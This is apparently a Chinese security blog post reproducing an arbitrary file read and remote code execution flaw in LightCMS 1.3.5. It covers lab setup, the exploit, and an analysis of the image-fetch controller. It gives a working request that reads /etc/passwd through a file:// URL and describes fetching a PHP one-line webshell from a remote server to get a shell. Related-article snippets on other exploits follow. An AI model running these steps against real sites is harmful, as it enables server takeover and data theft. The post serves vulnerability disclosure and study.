LightCMS1.3.5-任意文件读取&RCE漏洞

最新推荐文章于 2024-09-12 11:00:42 发布
最新推荐文章于 2024-09-12 11:00:42 发布
阅读量1.5k 收藏 2
点赞数 1
分类专栏: 代码审计 文章标签: lightcms RCE php代码审计 新星计划
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/117755107
版权

LightCMS1.3.5-任意文件读取&RCE漏洞

环境搭建(Kali)

个人环境配置:php7.4.15 + mysql8.0.25

  1. 首先确保系统已安装好composer,可以参考我之前写的文章:文章链接
  2. 下载文件源码
cd /var/www/html
git clone https://hub.fastgit.org/eddy8/LightCMS.git
cd lightCMS
composer install
  1. 设置目录权限:storage/和bootstrap/cache/目录需要写入权限。
sudo chmod 777 -R storage/ bootstrap/cache/
  1. 新建一份环境配置,并配置好数据库等相关配置
cp .env.example .env

数据库配置:
CREATE DATABASE homestead;
CREATE USER 'homestead'@'localhost' IDENTIFIED BY 'secret';
GRANT ALL PRIVILEGES ON *.* TO 'homestead'@'localhost';
FLUSH PRIVILEGES;

初始化系统

php artisan migrate --seed

PS:这里可能会遇到一些问题,我备注一下自己遇到的问题及其解决方案
1、安装组件时如果无法生成vendor目录可以运行composer install --ignore-platform-reqs命令
2、启动服务时Illuminate\Database\QueryException报错可能是因为没有安装php-mysql依赖
step1:php -v
step2: Install php mysql extension
php 7.x sudo apt-get install php7.x-mysql
step3: service apache2 restart
step4: php artisan migrate
  1. 后台访问地址:/admin/login
默认用户(此用户为超级用户,不受权限管理限制):admin/admin
这里可能会遇到图形验证码无法显示,终端输入:apt-get install php7.x-gd

在这里插入图片描述

漏洞复现

利用点一

使用admin/admin登录管理员
访问http://ip/admin/neditor/serve/catchimage,POST传file=file:///etc/passwd,此时会返回

{"list":[{"url":"http://light.com/upload/image/202106/0f1726ba83325848d47e216b29d5ab99.jpg","source":"file:///etc/passwd","state":"SUCCESS"}]}

在这里插入图片描述

根据返回值,直接访问链接地址即可

利用点二

直接传php文件RCE,构造一个php脚本放置vps下,访问读取该文件

在这里插入图片描述
在这里插入图片描述

漏洞分析

这个漏洞出在app/Http/Controllers/Admin/NEditorController.php中的远程下载图片的功能

在这里插入图片描述

这里简单使用了file_get_contents来获取并保存文件内容,所以我们可以使用file协议实现任意文件读取等ssrf操作,更危险的是这里的逻辑是取到的文件名后缀是什么,保存的就是什么后缀,所以我们可以放一个php一句话在服务器上,然后来请求该一句话文件来达到getshell的目的

H3rmesk1t
关注
专栏目录
蓝凌oa任意文件读取RCE
Dalian0的博客
11-03 4554
蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce 漏洞路径: 1.任意文件读取: /sys/ui/extend/varkind/custom.jsp 漏洞验证: burp抓包修改数据包 修改为post请求,路径如图 数据包 POST /sys/ui.
LightCMS全版本后台RCE 0day分析1
08-03
LightCMS全版本后台RCE 0day分析1】这篇技术文章主要探讨了一个针对LightCMS的严重漏洞,该漏洞允许远程代码执行(RCE)通过Phar反序列化机制。LightCMS是一款基于Laravel框架的Content Management System(CMS)...
LightCMS1.3.7-RCE漏洞
LYJ20010728的博客
06-10 399
LightCMS1.3.7-RCE漏洞环境搭建(Kali)漏洞复现漏洞分析 环境搭建(Kali) 参考之间的文章:LightCMS1.3.5-任意文件读取&RCE漏洞 漏洞复现 找一个 Laravel RCE 的 gadget,生成 phar 文件,exp如下 POP_1 <?php namespace Illuminate\Broadcasting{ class PendingBroadcast { protected $events;
CVE-2024-2961:将phpfilter任意文件读取提升为远程代码执行(RCE
jennycisp的博客
07-03 1276
在nvd网站上是这样描述的:谷歌翻译过来就是:GNU C 库 (也就是glibc)2.39 及更早版本中的 iconv() 函数在将字符串转换为 ISO-2022-CN-EXT 字符集时,可能会使传递给它的输出缓冲区溢出最多 4 个字节,这可能会导致应用程序崩溃或覆盖相邻变量。缓冲区溢出是二进制安全研究领域里很常见的漏洞。所谓缓冲区溢出是指当一段程序尝试把更多的数据放入一个缓冲区,数据超出了缓冲区本身的容量,导致数据溢出到被分配空间之外的内存空间,使得溢出的数据覆盖了其他内存空间的数据。
[PHP代码审计]LightCMS1.3.7存在命令执行漏洞
Y4tacker的博客
06-07 863
文章目录写在前面利用姿势分析 写在前面 之前就想复现来着了,后来给我忘了,今晚补上吧 利用姿势 首先用phpggc生成一个phar,当然嫌弃懒的话可以用这个 <?php namespace Illuminate\Broadcasting{ class PendingBroadcast { protected $events; protected $event; public function __construct($events,
任意文件读取rce记录
2401_84434570的博客
05-03 549
尝试了一些常用的手法例如构造报错等均未找到目标,尬住了一会儿后,想到了之前的跨目录上传,既然上传处可以使用../进行跨目录,那么上传后的预览处呢?回头仔细看上传的数据包,发现上传的参数type的值返回在了系统的绝对路径中,猜测type的值即为上传的文件夹,将type改成1尝试,印证了猜想,且是可以直接上传jsp的!上述的情况都是登录后测试的,如果上传点是fuzz出来的,没有目标系统的账号,也可以采取如下几种方案。1.尝试直接上传至系统的静态目录,例如系统自动加载的js文件的目录。
gitlab任意文件读取漏洞(可能RCE
公众号shadow sock7
04-28 3525
参考: https://hackerone.com/reports/827052 受影响版本下载: https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb wget --content-disposition https://packages.gitlab...
lightCMS系统源码-基于Laravel 5.5开发前端框架基于layui.zip
07-01
lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。lightCMS集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等CMS系统中常用的功能。...
LightCMS源代码
03-15
lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。lightCMS集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等CMS系统中常用的功能。...
LightCMS 轻量级cms系统
08-14
lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。lightCMS集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等CMS系统中常用的功能。...
LightCMS v2.0.zip
03-25
LightCMS v2.0 是一个基于Web的轻量级内容管理系统,主要针对个人或小型企业建站需求。这个系统提供了一套完整的网站构建框架,包括后台管理界面、模板引擎、数据库支持以及各种功能模块,使得非专业程序员也能快速...
LightCMSLightCMS是一个基于Laravel开发的轻量级CMS系统,也可以作为一个通用的后台管理框架使用
02-03
LightCMS 项目简介 lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。 lightCMS集成了用户管理,权限管理,日志管理,菜单管理等后台管理框架的通用功能,同时也提供模型管理,分类管理等CMS系统中常用的功能。 lightCMS的代码一键生成功能可以快速对特定模型生成增删改查代码,极大提高开发效率。 lightCMS基于Laravel 6.x开发,基于前端框架layui 。 演示站点: 。登录信息:admin / admin。不要存储/删除重要数据,数据库会定时重置。 LightCMS&Laravel学习交流QQ群: 972796921 版本库分区说明: 分支名称 Laravel版本 备注 主 6.x 建议使用 8.x 8.x 7.x 7.x 5.5 5.5 功能点一览 后台: 基于RBAC的权限管理 管理员,日志,菜单管理 分类管理 标签管理 配置管理 模型,模型基线,模型内容管理(后台可自定义业务模型,方便垂直行业快速开发) 会员管理 评论管理 基于Tire算法的敏感词过滤系统 普通模型增删改查代码一键生成 前台: 用户注册登
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)_用友u8-cloud fileservlet接口存在任意文件读取漏洞
m0_60229361的博客
04-16 697
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
任意文件读取漏洞
m0_57276420的博客
04-08 5812
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用该漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
[Web安全 网络安全]-文件读取与下载漏洞
最新发布
刘鑫磊
09-12 708
文件读取与下载漏洞
任意文件读取/下载漏洞
qq_68163788的博客
05-23 3059
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
Web的基本漏洞--任意文件读取与下载漏洞
尽欢
06-05 2544
任意文件读取漏洞介绍、任意文件下载漏洞介绍、常见的敏感文件
LightCMS后台Phar反序列化RCE分析
"LightCMS全版本后台存在 Remote Code Execution (RCE) 0day漏洞,该漏洞通过Phar反序列化技术利用Laravel框架的弱点。攻击者可以通过图像上传功能上传phar文件,并通过特定的控制器方法触发RCE。分析过程中涉及到的...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值